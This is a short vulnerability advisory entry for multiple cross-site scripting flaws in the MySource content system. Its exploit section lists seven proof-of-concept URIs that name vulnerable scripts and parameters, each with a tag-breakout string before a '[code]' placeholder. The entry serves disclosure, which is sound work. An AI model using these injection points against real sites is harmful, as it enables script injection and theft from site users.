• info
• discussion
• exploit
• solution
• references

MySource Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

Example proof of concept URI have been provided:

http://www.example.com/web/edit/upgrade_in_progress_backend.php?target_url=">[code]
http://www.example.com/squizlib/bodycopy/pop_ups/insert_table.php?bgcolor=</style>[code]
http://www.example.com/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?bgcolor=</style>[code]
http://www.example.com/squizlib/bodycopy/pop_ups/header.php?bgcolor=</style>[code]
http://www.example.com/squizlib/bodycopy/pop_ups/edit_table_row_props.php?bgcolor=</style>[code]
http://www.example.com/squizlib/bodycopy/pop_ups/edit_table_props.php?bgcolor=</style>[code]
http://www.example.com/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code]